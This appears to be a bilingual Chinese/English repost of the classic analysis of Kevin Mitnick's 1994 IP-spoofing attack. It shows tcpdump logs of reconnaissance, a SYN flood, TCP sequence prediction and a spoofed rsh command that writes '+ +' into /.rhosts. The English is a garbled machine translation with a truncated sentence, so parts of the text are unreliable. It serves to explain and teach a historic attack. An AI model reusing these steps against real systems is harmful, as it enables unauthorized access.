Hacktivis Anonymous From Indonesia: Mitnick是怎样利用IP 序列攻击的 Mitnick is how to use the IP sequence attack

在John Markoff 的1/23/95 NYT 中的文章,还有CERT advisory CA-95:01之中提到很多关于IP地址的欺骗（ IP spoofing ）和hijacking攻击.这儿是我的一些技术资料。 John Markoff's 1/23/95 NYT in the article, there are CERT advisory CA-95: 01 being mentioned a lot about IP address spoofing (IP spoofing), and hijacking attacks. Here are some of my technical information. 希望它能帮助你明白这类攻击是怎么一回事。 Hope it helps you understand how this type of attack is the same thing.

这是两种截然不同的攻击手段.IP 源地址欺骗和TCP 序列序列预报是为了获得那些使用Xterminal 作为无盘工作站的初始的使用权。 These are two very different means of attack. IP source address spoofing and TCP sequence prediction is to obtain the sequence Xterminal as diskless workstations that use the initial right to use. 当root 权限被获得时,一个已知的到其他系统的连接就会被“可加载内核STREAMS 模块”或hijacked 。 When root access is obtained, a known connection to other systems will be "loadable kernel STREAMS module" or hijacked.

这次攻击中的数据记录都是由tcpdump 来完成的. 兴趣很明确(也很短!),有些日期被遗漏了.我特别推荐Steve Bellovin 的关于“IP spoofing”的文章,他对TCP 握手描述的非常详细, 也提出了怎样阻止这种攻击手段. The attack in the data record to be completed by tcpdump. Interest is clear (very short!), Some dates were missing, and I particularly recommend Steve Bellovin on "IP spoofing" of the article, he describes the TCP handshake very detailed, but also on how to prevent such attacks.

我的设置是这样的: My setup is like this:

系桶= 运行Solaris 1 提供"X terminal"服务的SPARC 工作站x-terminal = 运行Solaris 1 提供"X terminal"服务目标= 攻击显然的目标 System to provide running Solaris 1 barrel = "X terminal" services x-terminal = SPARC workstation running Solaris 1 provides "X terminal" target = attacks apparently target

IP spoofing 攻击是从14:09:32 PST on 12/25/94 开始的.首先的探测来自toad.com (来自数据包的记录): IP spoofing attack 14:09:32 PST on 12/25/94 from the beginning, first detection from toad.com (data packets from the record):

14:09:32 toad.com# finger -l @target 14:09:32 toad.com # finger-l @ target
14:10:21 toad.com# finger -l @server 14:10:21 toad.com # finger-l @ server
14:10:50 toad.com# finger -l root@server 14:10:50 toad.com # finger-l root @ server
14:11:07 toad.com# finger -l @x-terminal 14:11:07 toad.com # finger-l @ x-terminal
14:11:38 toad.com# showmount -e x-terminal 14:11:38 toad.com # showmount-e x-terminal
14:11:49 toad.com# rpcinfo -p x-terminal 14:11:49 toad.com # rpcinfo-p x-terminal
14:12:05 toad.com# finger -l root@x-terminal 14:12:05 toad.com # finger-l root @ x-terminal

这样的探测是为了查看在这些系统之中有什么信赖关系，借此可以发动IP spoofing攻击.从showmount 和rpcinfo 的源端口可以看出是toad.com 的root This probe was among these systems to see what the relationship of trust to be launching IP spoofing attack from the showmount and rpcinfo can see the source port is the root toad.com

六分钟之后, 我们收到了大量的TCP SYN 请求(TCP 连接的请求)，是来自130.92.6.97到服务器上的513 (login) 端口.这些SYN 请求的目的就是堵塞513端口的连接队列，使其成为半开连接状态，因此无法接受其它的新的连接请求.详细些就是，它是不会对那些SYN-ACK请求发送 TCP RST回应的。 Six minutes later, we received a flood of TCP SYN requests (TCP connection request), from 130.92.6.97 to the server 513 (login) ports. The purpose of these SYN requests a connection port 513 is blocked queue, it a half-open connection state and therefore can not accept other new connection request is more detailed, it is not SYN-ACK request for those who send a TCP RST response.

[梦：关于此处，看看TCP连接的三次握手] [Dream: on here, take a look at the three-way handshake TCP connection]

513 端口是一个“特权”(< IPPORT_RESERVED)端口, server.login 可以被假定的源地址安全的使用,是在UNIX上的"r-服务" (rsh, rlogin)进行地址spoofing攻击的。 513 port is a "privilege" ( server.login: S 1382726960:1382726960(0) win 4096 14:18:22.516699 130.92.6.97.600> server.login: S 1382726960:1382726960 (0) win 4096
14:18:22.566069 130.92.6.97.601 > server.login: S 1382726961:1382726961(0) win 4096 14:18:22.566069 130.92.6.97.601> server.login: S 1382726961:1382726961 (0) win 4096
14:18:22.744477 130.92.6.97.602 > server.login: S 1382726962:1382726962(0) win 4096 14:18:22.744477 130.92.6.97.602> server.login: S 1382726962:1382726962 (0) win 4096
14:18:22.830111 130.92.6.97.603 > server.login: S 1382726963:1382726963(0) win 4096 14:18:22.830111 130.92.6.97.603> server.login: S 1382726963:1382726963 (0) win 4096
14:18:22.886128 130.92.6.97.604 > server.login: S 1382726964:1382726964(0) win 4096 14:18:22.886128 130.92.6.97.604> server.login: S 1382726964:1382726964 (0) win 4096
14:18:22.943514 130.92.6.97.605 > server.login: S 1382726965:1382726965(0) win 4096 14:18:22.943514 130.92.6.97.605> server.login: S 1382726965:1382726965 (0) win 4096
14:18:23.002715 130.92.6.97.606 > server.login: S 1382726966:1382726966(0) win 4096 14:18:23.002715 130.92.6.97.606> server.login: S 1382726966:1382726966 (0) win 4096
14:18:23.103275 130.92.6.97.607 > server.login: S 1382726967:1382726967(0) win 4096 14:18:23.103275 130.92.6.97.607> server.login: S 1382726967:1382726967 (0) win 4096
14:18:23.162781 130.92.6.97.608 > server.login: S 1382726968:1382726968(0) win 4096 14:18:23.162781 130.92.6.97.608> server.login: S 1382726968:1382726968 (0) win 4096
14:18:23.225384 130.92.6.97.609 > server.login: S 1382726969:1382726969(0) win 4096 14:18:23.225384 130.92.6.97.609> server.login: S 1382726969:1382726969 (0) win 4096
14:18:23.282625 130.92.6.97.610 > server.login: S 1382726970:1382726970(0) win 4096 14:18:23.282625 130.92.6.97.610> server.login: S 1382726970:1382726970 (0) win 4096
14:18:23.342657 130.92.6.97.611 > server.login: S 1382726971:1382726971(0) win 4096 14:18:23.342657 130.92.6.97.611> server.login: S 1382726971:1382726971 (0) win 4096
14:18:23.403083 130.92.6.97.612 > server.login: S 1382726972:1382726972(0) win 4096 14:18:23.403083 130.92.6.97.612> server.login: S 1382726972:1382726972 (0) win 4096
14:18:23.903700 130.92.6.97.613 > server.login: S 1382726973:1382726973(0) win 4096 14:18:23.903700 130.92.6.97.613> server.login: S 1382726973:1382726973 (0) win 4096
14:18:24.003252 130.92.6.97.614 > server.login: S 1382726974:1382726974(0) win 4096 14:18:24.003252 130.92.6.97.614> server.login: S 1382726974:1382726974 (0) win 4096
14:18:24.084827 130.92.6.97.615 > server.login: S 1382726975:1382726975(0) win 4096 14:18:24.084827 130.92.6.97.615> server.login: S 1382726975:1382726975 (0) win 4096
14:18:24.142774 130.92.6.97.616 > server.login: S 1382726976:1382726976(0) win 4096 14:18:24.142774 130.92.6.97.616> server.login: S 1382726976:1382726976 (0) win 4096
14:18:24.203195 130.92.6.97.617 > server.login: S 1382726977:1382726977(0) win 4096 14:18:24.203195 130.92.6.97.617> server.login: S 1382726977:1382726977 (0) win 4096
14:18:24.294773 130.92.6.97.618 > server.login: S 1382726978:1382726978(0) win 4096 14:18:24.294773 130.92.6.97.618> server.login: S 1382726978:1382726978 (0) win 4096
14:18:24.382841 130.92.6.97.619 > server.login: S 1382726979:1382726979(0) win 4096 14:18:24.382841 130.92.6.97.619> server.login: S 1382726979:1382726979 (0) win 4096
14:18:24.443309 130.92.6.97.620 > server.login: S 1382726980:1382726980(0) win 4096 14:18:24.443309 130.92.6.97.620> server.login: S 1382726980:1382726980 (0) win 4096
14:18:24.643249 130.92.6.97.621 > server.login: S 1382726981:1382726981(0) win 4096 14:18:24.643249 130.92.6.97.621> server.login: S 1382726981:1382726981 (0) win 4096
14:18:24.906546 130.92.6.97.622 > server.login: S 1382726982:1382726982(0) win 4096 14:18:24.906546 130.92.6.97.622> server.login: S 1382726982:1382726982 (0) win 4096
14:18:24.963768 130.92.6.97.623 > server.login: S 1382726983:1382726983(0) win 4096 14:18:24.963768 130.92.6.97.623> server.login: S 1382726983:1382726983 (0) win 4096
14:18:25.022853 130.92.6.97.624 > server.login: S 1382726984:1382726984(0) win 4096 14:18:25.022853 130.92.6.97.624> server.login: S 1382726984:1382726984 (0) win 4096
14:18:25.153536 130.92.6.97.625 > server.login: S 1382726985:1382726985(0) win 4096 14:18:25.153536 130.92.6.97.625> server.login: S 1382726985:1382726985 (0) win 4096
14:18:25.400869 130.92.6.97.626 > server.login: S 1382726986:1382726986(0) win 4096 14:18:25.400869 130.92.6.97.626> server.login: S 1382726986:1382726986 (0) win 4096
14:18:25.483127 130.92.6.97.627 > server.login: S 1382726987:1382726987(0) win 4096 14:18:25.483127 130.92.6.97.627> server.login: S 1382726987:1382726987 (0) win 4096
14:18:25.599582 130.92.6.97.628 > server.login: S 1382726988:1382726988(0) win 4096 14:18:25.599582 130.92.6.97.628> server.login: S 1382726988:1382726988 (0) win 4096
14:18:25.653131 130.92.6.97.629 > server.login: S 1382726989:1382726989(0) win 4096 14:18:25.653131 130.92.6.97.629> server.login: S 1382726989:1382726989 (0) win 4096

服务器首先为前8 个SYN 请求生成SYN-ACK ，此时队列并没有排满.服务器会不停的重复发送这些SYN-ACK，那么就等于就没有其它的ACK 了. Server first for the first eight SYN requests generated SYN-ACK, then the queue is not filled. Server will send stop repeating these SYN-ACK, then it means there is no ACK for the other.

我们现在看到的是20个从apollo.it.luc.edu 连接到x-terminal.shell 的请求.这样做的目的就是为了增加x-terminal 的TCP 序列.初始的序列由于连接的增加而不断增加, 就是说SYN We are seeing now is from apollo.it.luc.edu 20 connected to the x-terminal.shell request. The aim is to increase the x-terminal's TCP sequence the initial sequence is connected and continuous increase increase, that SYN
数据包并没有被系统的TCP执行所生成.这样就会对每个意外的SYN-ACK 所生成RST ,那么在x- Packet has not been generated by the system's TCP implementation, so that for each accident would be the SYN-ACK generated by the RST, then the x-
terminal上的数列没有被排满: terminal on the series has not been filled:

14:18:25.906002 apollo.it.luc.edu.1000 > x-terminal.shell: S 1382726990:1382726990(0) win 4096 14:18:25.906002 apollo.it.luc.edu.1000> x-terminal.shell: S 1382726990:1382726990 (0) win 4096
14:18:26.094731 x-terminal.shell > apollo.it.luc.edu.1000: S 2021824000:2021824000(0) ack 1382726991 win 4096 14:18:26.094731 x-terminal.shell> apollo.it.luc.edu.1000: S 2021824000:2021824000 (0) ack 1382726991 win 4096
14:18:26.172394 apollo.it.luc.edu.1000 > x-terminal.shell: R 1382726991:1382726991(0) win 0 14:18:26.172394 apollo.it.luc.edu.1000> x-terminal.shell: R 1382726991:1382726991 (0) win 0
14:18:26.507560 apollo.it.luc.edu.999 > x-terminal.shell: S 1382726991:1382726991(0) win 4096 14:18:26.507560 apollo.it.luc.edu.999> x-terminal.shell: S 1382726991:1382726991 (0) win 4096
14:18:26.694691 x-terminal.shell > apollo.it.luc.edu.999: S 2021952000:2021952000(0) ack 1382726992 win 4096 14:18:26.694691 x-terminal.shell> apollo.it.luc.edu.999: S 2021952000:2021952000 (0) ack 1382726992 win 4096
14:18:26.775037 apollo.it.luc.edu.999 > x-terminal.shell: R 1382726992:1382726992(0) win 0 14:18:26.775037 apollo.it.luc.edu.999> x-terminal.shell: R 1382726992:1382726992 (0) win 0
14:18:26.775395 apollo.it.luc.edu.999 > x-terminal.shell: R 1382726992:1382726992(0) win 0 14:18:26.775395 apollo.it.luc.edu.999> x-terminal.shell: R 1382726992:1382726992 (0) win 0
14:18:27.014050 apollo.it.luc.edu.998 > x-terminal.shell: S 1382726992:1382726992(0) win 4096 14:18:27.014050 apollo.it.luc.edu.998> x-terminal.shell: S 1382726992:1382726992 (0) win 4096
14:18:27.174846 x-terminal.shell > apollo.it.luc.edu.998: S 2022080000:2022080000(0) ack 1382726993 win 4096 14:18:27.174846 x-terminal.shell> apollo.it.luc.edu.998: S 2022080000:2022080000 (0) ack 1382726993 win 4096
14:18:27.251840 apollo.it.luc.edu.998 > x-terminal.shell: R 1382726993:1382726993(0) win 0 14:18:27.251840 apollo.it.luc.edu.998> x-terminal.shell: R 1382726993:1382726993 (0) win 0
14:18:27.544069 apollo.it.luc.edu.997 > x-terminal.shell: S 1382726993:1382726993(0) win 4096 14:18:27.544069 apollo.it.luc.edu.997> x-terminal.shell: S 1382726993:1382726993 (0) win 4096
14:18:27.714932 x-terminal.shell > apollo.it.luc.edu.997: S 2022208000:2022208000(0) ack 1382726994 win 4096 14:18:27.714932 x-terminal.shell> apollo.it.luc.edu.997: S 2022208000:2022208000 (0) ack 1382726994 win 4096
14:18:27.794456 apollo.it.luc.edu.997 > x-terminal.shell: R 1382726994:1382726994(0) win 0 14:18:27.794456 apollo.it.luc.edu.997> x-terminal.shell: R 1382726994:1382726994 (0) win 0
14:18:28.054114 apollo.it.luc.edu.996 > x-terminal.shell: S 1382726994:1382726994(0) win 4096 14:18:28.054114 apollo.it.luc.edu.996> x-terminal.shell: S 1382726994:1382726994 (0) win 4096
14:18:28.224935 x-terminal.shell > apollo.it.luc.edu.996: S 2022336000:2022336000(0) ack 1382726995 win 4096 14:18:28.224935 x-terminal.shell> apollo.it.luc.edu.996: S 2022336000:2022336000 (0) ack 1382726995 win 4096
14:18:28.305578 apollo.it.luc.edu.996 > x-terminal.shell: R 1382726995:1382726995(0) win 0 14:18:28.305578 apollo.it.luc.edu.996> x-terminal.shell: R 1382726995:1382726995 (0) win 0
14:18:28.564333 apollo.it.luc.edu.995 > x-terminal.shell: S 1382726995:1382726995(0) win 4096 14:18:28.564333 apollo.it.luc.edu.995> x-terminal.shell: S 1382726995:1382726995 (0) win 4096
14:18:28.734953 x-terminal.shell > apollo.it.luc.edu.995: S 2022464000:2022464000(0) ack 1382726996 win 4096 14:18:28.734953 x-terminal.shell> apollo.it.luc.edu.995: S 2022464000:2022464000 (0) ack 1382726996 win 4096
14:18:28.811591 apollo.it.luc.edu.995 > x-terminal.shell: R 1382726996:1382726996(0) win 0 14:18:28.811591 apollo.it.luc.edu.995> x-terminal.shell: R 1382726996:1382726996 (0) win 0
14:18:29.074990 apollo.it.luc.edu.994 > x-terminal.shell: S 1382726996:1382726996(0) win 4096 14:18:29.074990 apollo.it.luc.edu.994> x-terminal.shell: S 1382726996:1382726996 (0) win 4096
14:18:29.274572 x-terminal.shell > apollo.it.luc.edu.994: S 2022592000:2022592000(0) ack 1382726997 win 4096 14:18:29.274572 x-terminal.shell> apollo.it.luc.edu.994: S 2022592000:2022592000 (0) ack 1382726997 win 4096
14:18:29.354139 apollo.it.luc.edu.994 > x-terminal.shell: R 1382726997:1382726997(0) win 0 14:18:29.354139 apollo.it.luc.edu.994> x-terminal.shell: R 1382726997:1382726997 (0) win 0
14:18:29.354616 apollo.it.luc.edu.994 > x-terminal.shell: R 1382726997:1382726997(0) win 0 14:18:29.354616 apollo.it.luc.edu.994> x-terminal.shell: R 1382726997:1382726997 (0) win 0
14:18:29.584705 apollo.it.luc.edu.993 > x-terminal.shell: S 1382726997:1382726997(0) win 4096 14:18:29.584705 apollo.it.luc.edu.993> x-terminal.shell: S 1382726997:1382726997 (0) win 4096
14:18:29.755054 x-terminal.shell > apollo.it.luc.edu.993: S 2022720000:2022720000(0) ack 1382726998 win 4096 14:18:29.755054 x-terminal.shell> apollo.it.luc.edu.993: S 2022720000:2022720000 (0) ack 1382726998 win 4096
14:18:29.840372 apollo.it.luc.edu.993 > x-terminal.shell: R 1382726998:1382726998(0) win 0 14:18:29.840372 apollo.it.luc.edu.993> x-terminal.shell: R 1382726998:1382726998 (0) win 0
14:18:30.094299 apollo.it.luc.edu.992 > x-terminal.shell: S 1382726998:1382726998(0) win 4096 14:18:30.094299 apollo.it.luc.edu.992> x-terminal.shell: S 1382726998:1382726998 (0) win 4096
14:18:30.265684 x-terminal.shell > apollo.it.luc.edu.992: S 2022848000:2022848000(0) ack 1382726999 win 4096 14:18:30.265684 x-terminal.shell> apollo.it.luc.edu.992: S 2022848000:2022848000 (0) ack 1382726999 win 4096
14:18:30.342506 apollo.it.luc.edu.992 > x-terminal.shell: R 1382726999:1382726999(0) win 0 14:18:30.342506 apollo.it.luc.edu.992> x-terminal.shell: R 1382726999:1382726999 (0) win 0
14:18:30.604547 apollo.it.luc.edu.991 > x-terminal.shell: S 1382726999:1382726999(0) win 4096 14:18:30.604547 apollo.it.luc.edu.991> x-terminal.shell: S 1382726999:1382726999 (0) win 4096
14:18:30.775232 x-terminal.shell > apollo.it.luc.edu.991: S 2022976000:2022976000(0) ack 1382727000 win 4096 14:18:30.775232 x-terminal.shell> apollo.it.luc.edu.991: S 2022976000:2022976000 (0) ack 1382727000 win 4096
14:18:30.852084 apollo.it.luc.edu.991 > x-terminal.shell: R 1382727000:1382727000(0) win 0 14:18:30.852084 apollo.it.luc.edu.991> x-terminal.shell: R 1382727000:1382727000 (0) win 0
14:18:31.115036 apollo.it.luc.edu.990 > x-terminal.shell: S 1382727000:1382727000(0) win 4096 14:18:31.115036 apollo.it.luc.edu.990> x-terminal.shell: S 1382727000:1382727000 (0) win 4096
14:18:31.284694 x-terminal.shell > apollo.it.luc.edu.990: S 2023104000:2023104000(0) ack 1382727001 win 4096 14:18:31.284694 x-terminal.shell> apollo.it.luc.edu.990: S 2023104000:2023104000 (0) ack 1382727001 win 4096
14:18:31.361684 apollo.it.luc.edu.990 > x-terminal.shell: R 1382727001:1382727001(0) win 0 14:18:31.361684 apollo.it.luc.edu.990> x-terminal.shell: R 1382727001:1382727001 (0) win 0
14:18:31.627817 apollo.it.luc.edu.989 > x-terminal.shell: S 1382727001:1382727001(0) win 4096 14:18:31.627817 apollo.it.luc.edu.989> x-terminal.shell: S 1382727001:1382727001 (0) win 4096
14:18:31.795260 x-terminal.shell > apollo.it.luc.edu.989: S 2023232000:2023232000(0) ack 1382727002 win 4096 14:18:31.795260 x-terminal.shell> apollo.it.luc.edu.989: S 2023232000:2023232000 (0) ack 1382727002 win 4096
14:18:31.873056 apollo.it.luc.edu.989 > x-terminal.shell: R 1382727002:1382727002(0) win 0 14:18:31.873056 apollo.it.luc.edu.989> x-terminal.shell: R 1382727002:1382727002 (0) win 0
14:18:32.164597 apollo.it.luc.edu.988 > x-terminal.shell: S 1382727002:1382727002(0) win 4096 14:18:32.164597 apollo.it.luc.edu.988> x-terminal.shell: S 1382727002:1382727002 (0) win 4096
14:18:32.335373 x-terminal.shell > apollo.it.luc.edu.988: S 2023360000:2023360000(0) ack 1382727003 win 4096 14:18:32.335373 x-terminal.shell> apollo.it.luc.edu.988: S 2023360000:2023360000 (0) ack 1382727003 win 4096
14:18:32.413041 apollo.it.luc.edu.988 > x-terminal.shell: R 1382727003:1382727003(0) win 0 14:18:32.413041 apollo.it.luc.edu.988> x-terminal.shell: R 1382727003:1382727003 (0) win 0
14:18:32.674779 apollo.it.luc.edu.987 > x-terminal.shell: S 1382727003:1382727003(0) win 4096 14:18:32.674779 apollo.it.luc.edu.987> x-terminal.shell: S 1382727003:1382727003 (0) win 4096
14:18:32.845373 x-terminal.shell > apollo.it.luc.edu.987: S 2023488000:2023488000(0) ack 1382727004 win 4096 14:18:32.845373 x-terminal.shell> apollo.it.luc.edu.987: S 2023488000:2023488000 (0) ack 1382727004 win 4096
14:18:32.922158 apollo.it.luc.edu.987 > x-terminal.shell: R 1382727004:1382727004(0) win 0 14:18:32.922158 apollo.it.luc.edu.987> x-terminal.shell: R 1382727004:1382727004 (0) win 0
14:18:33.184839 apollo.it.luc.edu.986 > x-terminal.shell: S 1382727004:1382727004(0) win 4096 14:18:33.184839 apollo.it.luc.edu.986> x-terminal.shell: S 1382727004:1382727004 (0) win 4096
14:18:33.355505 x-terminal.shell > apollo.it.luc.edu.986: S 2023616000:2023616000(0) ack 1382727005 win 4096 14:18:33.355505 x-terminal.shell> apollo.it.luc.edu.986: S 2023616000:2023616000 (0) ack 1382727005 win 4096
14:18:33.435221 apollo.it.luc.edu.986 > x-terminal.shell: R 1382727005:1382727005(0) win 0 14:18:33.435221 apollo.it.luc.edu.986> x-terminal.shell: R 1382727005:1382727005 (0) win 0
14:18:33.695170 apollo.it.luc.edu.985 > x-terminal.shell: S 1382727005:1382727005(0) win 4096 14:18:33.695170 apollo.it.luc.edu.985> x-terminal.shell: S 1382727005:1382727005 (0) win 4096
14:18:33.985966 x-terminal.shell > apollo.it.luc.edu.985: S 2023744000:2023744000(0) ack 1382727006 win 4096 14:18:33.985966 x-terminal.shell> apollo.it.luc.edu.985: S 2023744000:2023744000 (0) ack 1382727006 win 4096
14:18:34.062407 apollo.it.luc.edu.985 > x-terminal.shell: R 1382727006:1382727006(0) win 0 14:18:34.062407 apollo.it.luc.edu.985> x-terminal.shell: R 1382727006:1382727006 (0) win 0
14:18:34.204953 apollo.it.luc.edu.984 > x-terminal.shell: S 1382727006:1382727006(0) win 4096 14:18:34.204953 apollo.it.luc.edu.984> x-terminal.shell: S 1382727006:1382727006 (0) win 4096
14:18:34.375641 x-terminal.shell > apollo.it.luc.edu.984: S 2023872000:2023872000(0) ack 1382727007 win 4096 14:18:34.375641 x-terminal.shell> apollo.it.luc.edu.984: S 2023872000:2023872000 (0) ack 1382727007 win 4096
14:18:34.452830 apollo.it.luc.edu.984 > x-terminal.shell: R 1382727007:1382727007(0) win 0 14:18:34.452830 apollo.it.luc.edu.984> x-terminal.shell: R 1382727007:1382727007 (0) win 0
14:18:34.714996 apollo.it.luc.edu.983 > x-terminal.shell: S 1382727007:1382727007(0) win 4096 14:18:34.714996 apollo.it.luc.edu.983> x-terminal.shell: S 1382727007:1382727007 (0) win 4096
14:18:34.885071 x-terminal.shell > apollo.it.luc.edu.983: S 2024000000:2024000000(0) ack 1382727008 win 4096 14:18:34.885071 x-terminal.shell> apollo.it.luc.edu.983: S 2024000000:2024000000 (0) ack 1382727008 win 4096
14:18:34.962030 apollo.it.luc.edu.983 > x-terminal.shell: R 1382727008:1382727008(0) win 0 14:18:34.962030 apollo.it.luc.edu.983> x-terminal.shell: R 1382727008:1382727008 (0) win 0
14:18:35.225869 apollo.it.luc.edu.982 > x-terminal.shell: S 1382727008:1382727008(0) win 4096 14:18:35.225869 apollo.it.luc.edu.982> x-terminal.shell: S 1382727008:1382727008 (0) win 4096
14:18:35.395723 x-terminal.shell > apollo.it.luc.edu.982: S 2024128000:2024128000(0) ack 1382727009 win 4096 14:18:35.395723 x-terminal.shell> apollo.it.luc.edu.982: S 2024128000:2024128000 (0) ack 1382727009 win 4096
14:18:35.472150 apollo.it.luc.edu.982 > x-terminal.shell: R 1382727009:1382727009(0) win 0 14:18:35.472150 apollo.it.luc.edu.982> x-terminal.shell: R 1382727009:1382727009 (0) win 0
14:18:35.735077 apollo.it.luc.edu.981 > x-terminal.shell: S 1382727009:1382727009(0) win 4096 14:18:35.735077 apollo.it.luc.edu.981> x-terminal.shell: S 1382727009:1382727009 (0) win 4096
14:18:35.905684 x-terminal.shell > apollo.it.luc.edu.981: S 2024256000:2024256000(0) ack 1382727010 win 4096 14:18:35.905684 x-terminal.shell> apollo.it.luc.edu.981: S 2024256000:2024256000 (0) ack 1382727010 win 4096
14:18:35.983078 apollo.it.luc.edu.981 > x-terminal.shell: R 1382727010:1382727010(0) win 0 14:18:35.983078 apollo.it.luc.edu.981> x-terminal.shell: R 1382727010:1382727010 (0) win 0

注意每个x-terminal送出的SYN-ACK 数据包通过x-terminal 有个初始数列，并且都比前一个来的大. Note that each x-terminal sent the SYN-ACK packets have an initial x-terminal sequence, and to the large than the one before.

我们看到一个伪造的SYN (连接请求), 是从server.login 送到x-terminal.shell 的。 We see a forged SYN (connection request) is sent to x-terminal.shell from server.login's. 设想服务器如果被x-terminal所信任, 那么x-terminal 就可以利用了(甚至一些伪装的服务器)请求了. Imagine if the x-terminal server is trusted, then the x-terminal you can use (and even some of the spoofed server) request.

x-terminal 会对服务器回复一个SYN-ACK, 只有ACK 过的才可以打开连接.服务器会丢失送到server.login 的数据包，所以ACK 也要伪造. x-terminal will have the server replies with a SYN-ACK, ACK-off can only open the connection to the server server.login lost packets, so the ACK should be forged.

通常情况下, SYN-ACK 的数列需要用来生成有效的ACK. 虽然这样，攻击者可以预知序列包含在SYN-ACK 中，基于已知的x-terminal的tcp 序列生成规律,下面还可以用ACK 来对付那些没有看见的SYN-ACK : Under normal circumstances, SYN-ACK series are needed to generate a valid ACK. Nevertheless, the attacker can predict the sequence contained in the SYN-ACK, based on the known x-terminal sequence of tcp generation law, the following can also be used ACK against those who did not see the SYN-ACK:

14:18:36.245045 server.login > x-terminal.shell: S 1382727010:1382727010(0) win 4096 14:18:36.245045 server.login> x-terminal.shell: S 1382727010:1382727010 (0) win 4096
14:18:36.755522 server.login > x-terminal.shell: . ack 2024384001 win 4096 14:18:36.755522 server.login> x-terminal.shell:. Ack 2024384001 win 4096

现在被spoofing 的机器现在只有一种方法连接到x-terminal.shell服务器就是server.login. Now spoofing machine now only one way to connect to the x-terminal.shell server is server.login.
它可以维护连接connection 和send 请求可以通过完全ACK 掉。 It can maintain the connection and send connection requests can be completely lost ACK. 应该像下面这样: Should look like this:

14:18:37.265404 server.login > x-terminal.shell: P 0:2(2) ack 1 win 4096 14:18:37.265404 server.login> x-terminal.shell: P 0:2 (2) ack 1 win 4096
14:18:37.775872 server.login > x-terminal.shell: P 2:7(5) ack 1 win 4096 14:18:37.775872 server.login> x-terminal.shell: P 2:7 (5) ack 1 win 4096
14:18:38.287404 server.login > x-terminal.shell: P 7:32(25) ack 1 win 4096 14:18:38.287404 server.login> x-terminal.shell: P 7:32 (25) ack 1 win 4096

相当于: Is equivalent to:

14:18:37 server# rsh x-terminal "echo + + >>/.rhosts" 14:18:37 server # rsh x-terminal "echo + +>> /. Rhosts"

从第一个spoofed 的数据包共用了: < 16 秒的时间 From the first spoofed packet sharing the: <16 seconds 欺骗的；连接已经被终止了: Deception; connection has been terminated: 14:18:41.347003 server.login > x-terminal.shell: . ack 2 win 4096 14:18:41.347003 server.login> x-terminal.shell:. Ack 2 win 4096
14:18:42.255978 server.login > x-terminal.shell: . ack 3 win 4096 14:18:42.255978 server.login> x-terminal.shell:. Ack 3 win 4096
14:18:43.165874 server.login > x-terminal.shell: F 32:32(0) ack 3 win 4096 14:18:43.165874 server.login> x-terminal.shell: F 32:32 (0) ack 3 win 4096
14:18:52.179922 server.login > x-terminal.shell: R 1382727043:1382727043(0) win 4096 14:18:52.179922 server.login> x-terminal.shell: R 1382727043:1382727043 (0) win 4096
14:18:52.236452 server.login > x-terminal.shell: R 1382727044:1382727044(0) win 4096 14:18:52.236452 server.login> x-terminal.shell: R 1382727044:1382727044 (0) win 4096

我们现在看到RST 释放了在server.login 上的队列中的那些半连接和空连接: We now see the release of the RST in server.login queue on those half-empty connected and connection:

14:18:52.298431 130.92.6.97.600 > server.login: R 1382726960:1382726960(0) win 4096 14:18:52.298431 130.92.6.97.600> server.login: R 1382726960:1382726960 (0) win 4096
14:18:52.363877 130.92.6.97.601 > server.login: R 1382726961:1382726961(0) win 4096 14:18:52.363877 130.92.6.97.601> server.login: R 1382726961:1382726961 (0) win 4096
14:18:52.416916 130.92.6.97.602 > server.login: R 1382726962:1382726962(0) win 4096 14:18:52.416916 130.92.6.97.602> server.login: R 1382726962:1382726962 (0) win 4096
14:18:52.476873 130.92.6.97.603 > server.login: R 1382726963:1382726963(0) win 4096 14:18:52.476873 130.92.6.97.603> server.login: R 1382726963:1382726963 (0) win 4096
14:18:52.536573 130.92.6.97.604 > server.login: R 1382726964:1382726964(0) win 4096 14:18:52.536573 130.92.6.97.604> server.login: R 1382726964:1382726964 (0) win 4096
14:18:52.600899 130.92.6.97.605 > server.login: R 1382726965:1382726965(0) win 4096 14:18:52.600899 130.92.6.97.605> server.login: R 1382726965:1382726965 (0) win 4096
14:18:52.660231 130.92.6.97.606 > server.login: R 1382726966:1382726966(0) win 4096 14:18:52.660231 130.92.6.97.606> server.login: R 1382726966:1382726966 (0) win 4096
14:18:52.717495 130.92.6.97.607 > server.login: R 1382726967:1382726967(0) win 4096 14:18:52.717495 130.92.6.97.607> server.login: R 1382726967:1382726967 (0) win 4096
14:18:52.776502 130.92.6.97.608 > server.login: R 1382726968:1382726968(0) win 4096 14:18:52.776502 130.92.6.97.608> server.login: R 1382726968:1382726968 (0) win 4096
14:18:52.836536 130.92.6.97.609 > server.login: R 1382726969:1382726969(0) win 4096 14:18:52.836536 130.92.6.97.609> server.login: R 1382726969:1382726969 (0) win 4096
14:18:52.937317 130.92.6.97.610 > server.login: R 1382726970:1382726970(0) win 4096 14:18:52.937317 130.92.6.97.610> server.login: R 1382726970:1382726970 (0) win 4096
14:18:52.996777 130.92.6.97.611 > server.login: R 1382726971:1382726971(0) win 4096 14:18:52.996777 130.92.6.97.611> server.login: R 1382726971:1382726971 (0) win 4096
14:18:53.056758 130.92.6.97.612 > server.login: R 1382726972:1382726972(0) win 4096 14:18:53.056758 130.92.6.97.612> server.login: R 1382726972:1382726972 (0) win 4096
14:18:53.116850 130.92.6.97.613 > server.login: R 1382726973:1382726973(0) win 4096 14:18:53.116850 130.92.6.97.613> server.login: R 1382726973:1382726973 (0) win 4096
14:18:53.177515 130.92.6.97.614 > server.login: R 1382726974:1382726974(0) win 4096 14:18:53.177515 130.92.6.97.614> server.login: R 1382726974:1382726974 (0) win 4096
14:18:53.238496 130.92.6.97.615 > server.login: R 1382726975:1382726975(0) win 4096 14:18:53.238496 130.92.6.97.615> server.login: R 1382726975:1382726975 (0) win 4096
14:18:53.297163 130.92.6.97.616 > server.login: R 1382726976:1382726976(0) win 4096 14:18:53.297163 130.92.6.97.616> server.login: R 1382726976:1382726976 (0) win 4096
14:18:53.365988 130.92.6.97.617 > server.login: R 1382726977:1382726977(0) win 4096 14:18:53.365988 130.92.6.97.617> server.login: R 1382726977:1382726977 (0) win 4096
14:18:53.437287 130.92.6.97.618 > server.login: R 1382726978:1382726978(0) win 4096 14:18:53.437287 130.92.6.97.618> server.login: R 1382726978:1382726978 (0) win 4096
14:18:53.496789 130.92.6.97.619 > server.login: R 1382726979:1382726979(0) win 4096 14:18:53.496789 130.92.6.97.619> server.login: R 1382726979:1382726979 (0) win 4096
